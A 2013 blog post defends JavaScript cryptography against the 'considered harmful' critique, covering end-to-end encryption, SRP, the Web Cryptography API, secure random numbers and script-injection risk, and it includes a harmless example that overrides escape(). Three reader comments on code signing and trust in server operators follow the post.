Monday, August 5, 2013

In Defense of JavaScript Cryptography

Google "javascript cryptography" and you'll quickly find a fair number of people dismissing JS Crypto as a fools errand. My favorite is the Matasanto Security article entitled "JavaScript Cryptography Considered Harmful." The tone of the article seems a little alarmist to me. But... it also happens to bring up a few really great points. Its critique of the current state of web app crypto is mostly spot-on. However,  the state of the art is evolving quickly and may soon make the Matasano Security article mostly irrelevant.

This post is a brief rebuttal to the assertion that JavaScript cryptography should be considered "harmful." I would completely agree with "fraught with serious challenges" and "difficult to do right," but certainly not harmful.

Why Do JavaScript Crypto?

Before you can make a blanket statement like "JS Crypto is EVIL," you really should list out a few use cases. I think it's fair to say replicating HTTPS functionality in JavaScript is a poor idea. All popular browsers provide built-in support for HTTPS. What's more, these implementations have all been reviewed by multiple people to help ensure correctness and freedom from obvious bugs. So if you're just trying to communicate a password from a browser to a web server, use HTTPS. Don't try to replicate that functionality by yourself with JavaScript.

But there are several use cases where JS Crypto may be advantageous. The two I can think of off the top of my head are end-to-end message security and Secure/Stanford Remote Password (SRP) support. Neither of these use cases are directly supported by modern browsers and are of interest to the general community.

End-to-End message security means encrypting a message in such a way that it can only be decrypted by its intended recipient. In the context of JavaScript crypto, this means your favorite email, microblogging or IM web app uses JavaScript to encrypt your message. The encrypted message is then sent to its destination by whatever means and is ultimately decrypted by a web app running on the recipient's machine. In the end-to-end encryption scenario, the server never has access to your decrypted message; and unless you explicitly share your keys with the server, they never will.

End-to-end message security contrasts with "Transport Security" offered by SSL/TLS. HTTPS, which uses Secure Sockets Layer (SSL) aka Transport Layer Security (TLS), encrypts the link between the browser and the web server. To communicate securely with another person, you would send an un-encrypted message to your web server over the encrypted HTTPS link. The server would then forward the message to its recipient using a different (hopefully) encrypted HTTPS link. Because the message is un-encrypted when it gets to the server, the server operator can see the contents of the message. But because the link is encrypted, eavesdroppers listening in to the conversation should not be able to read the message.

Secure Remote Password (SRP), formerly known as Stanford Remote Password, is an authentication protocol with many desirable features: it is resistant to password dictionary attacks and establishes a shared session key which may be used to authenticate or encrypt messages between a client and server. Or, more likely, between a client and a piece of computing equipment "behind" the web server for which the web server acts as a proxy. To be sure, the SRP's utility is diminished by the near universal support of SSL/TLS, but there are definitely situations where it can be useful.

These are not the only reasons why you might want to use something other than HTTPS; but they are two reasonably important use cases not directly supported by SSL/TLS.

The Chicken and the Egg

The Matasano article assumes the reason you're using JavaScript crypto in your browser is to encrypt a user password for its trip from the browser to the server. It then presents this "chicken and egg" problem:
  • if you don't trust the internet to securely deliver a password from the browser to the client, why trust it to deliver a JavaScript encryption library?
  • and if you use HTTPS to ensure no one's tampered with your JavaScript encryption library, why not just use HTTPS to secure your password and be done with it.
I mostly agree with this assessment. However, there may be a situation where your javascript encryption library is served off a different host than the one you're communicating with. Imagine you're trying to communicate with an 8 or 16 bit microcontroller. There are several on the market today with enough CPU horsepower, memory and IO to speak SLIP or PPP (or even IPv6.) Due to policy, debugging or legal reasons, you may serve TLS pages off the microcontroller using only authentication. It's a bit of a corner-case, but I've actually found myself in exactly that situation. My microcontroller could handle authentication with ECDSA, but couldn't cope with a bulk cipher I was willing to use.

But there are some interesting developments in the chicken and egg question. It turns out there's a group of people working on a specification to introduce cryptographic primitives to the JavaScript in browsers. The Web Cryptography API is an emerging standard from the W3C and will provide basic crypto functions to JS web apps. When widely deployed, this should eliminate most the concerns dealing with the question "hey! where did my crypto implementation come from?"

Good Random Numbers

The Matasano article correctly observes the JavaScript Math.random() function is inappropriate for use in "real" security protocols. It simply doesn't utilize sufficient entropy. Fortunately, Chrome and Firefox have implemented the random number generator from the Web Cryptography API in recent builds. According to this Mozilla Development Network page, support for crypto.getRandomValues() was added in Chrome 11 and Firefox 21.

If you are truly interested in properly implementing security-related protocols, you must use this call instead of Math.random().

Extensible Languages and Insecure Content

IMHO, the fundamental concern with web apps is the risk that occurs when JavaScript's extensible nature meets insecure content. The Matasano article talked about this in the context of downloading javascript to implement crypto primitives, but once a bad guy can inject code into your JS execution context, it's all borked, not just the crypto.

The problem here stems from the fact that JavaScript is, by design, an extensible programming language. It's possible to replace some of the basic functions provided by JavaScript and the DOM API. Here's a simple example where I replace the escape() function with a function that reverses a string before escaping it:

window.prevescape = window.escape;
window.escape = function( input ) {
  var output = "";
  for( var i = 1, il = input.length; i <= il; i ++ ) {
    output += input.substr( input.length - i, 1 );
  }
  return prevescape( output );
};

This example doesn't do anything horrible, but it should demonstrate how easy it is to extend or even replace core JavaScript functionality. And it's just as easy to replace the code that manages import / export of cryptographic keys as it is to replace the escape() function.

The ability to replace or extend JavaScript functionality is a good thing when you're using it to fix bugs or add useful features. But if a bad guy can insert a script tag into your page, all bets are off, you're completely 0wn3d. Since it's unlikely you're going to hack your own web app, we need to figure out a way to prevent black hat script tags from appearing in your web page.

In Conclusion

Securely executing JavaScript applications in a browser is not hopelessly borked. Neither is JavaScript Crypto. You have to take care to defend against common vulnerabilities introduced by user generated content. Unless you defend against a man in the middle by sending content capable of modifying the javascript execution context over TLS, it will possible for a bad guy to insert bad guy code into your web application.

Progress is being made with the introduction of the Content Security Policy and Web Cryptography API specifications from the W3C. We're even starting to see browser developers implement them, which is a good thing.

But more work needs to be done to "secure" javascript code. It could be as simple as making the browser's crypto object read only. This would not eliminate all vulnerabilities, but will reduce the attack cross section. We could also require that all scripts referencing the crypto object adhere to common same-origin protections (modulo CORS or CSP.)

This article reflects my personal opinion, and may not reflect opinions or policies of my employer.

3 comments:

  1. Something I think JavaScript (or maybe Web resources generally) really needs is code signing, the way Windows and Java have had for a while. Code signing would allow you to have trusted code (written by an author you trust), without having to trust the server hosting it. The same-origin policy seems too much of an all-or-nothing prospect.

    For example, if all the JavaScript on a page is written by authors you trust, you could trust the whole thing, even if the HTML was written by an untrusted party.

    Because JavaScript is a dynamic language, code signing isn't quite as useful as it could be, but perhaps something could be figured out with sandboxing between signed and unsigned code, maybe using a Web Worker-like approach.

    While on the topic of features I like from Java, I think it would be nice to be able to distribute JavaScript libraries in archive formats (like Java does with JAR), rather than being forced to minify everything into one giant blob. Then maybe things like SPDY wouldn't be needed as much.

    ReplyDelete
  2. When you say "Since it's unlikely you're going to hack your own web app..." you should clarify who's web app it is. It does not belong to the client, the person who needs to rely on the cryptography. It belongs to whomever is serving it. With js cryptography the end user needs to trust the owner. With traditional cryptography the end user assumes no trust (other than correctness of implementation which is verifiable) in a third party. This is very relevant in light of government snooping. In the case of js cryptography the owner of the web app could be compelled by their government to hack their own system to betray the trust of the client. In traditional cryptography this is not a worry.

    ReplyDelete
    Replies
    1. Yes. If you point your browser at a web page maintained by an untrustworthy source then it doesn't matter if javascript crypto is any good. However, if you point your browser at a web page maintained by a trustworthy source, then it is very important that JS crypto and web security features be implemented correctly.

      Technology can't help you if the other side of the connection is untrustworthy. Even if they implemented security features correctly, they can still share your data with unauthorized parties.

      The term "trusted" has a different meaning than "secure." In secure systems, the term "trusted" means a component you trust inherently because you have to; because there is no way to use protocol or technology to ensure they will keep your data confidential.

      So yes. At the end of the day, you should only use privacy (and/or authentication) services from organizations you trust. And that goes for chip vendors, OS developers and software vendors of all stripes; not just web pages.

      Delete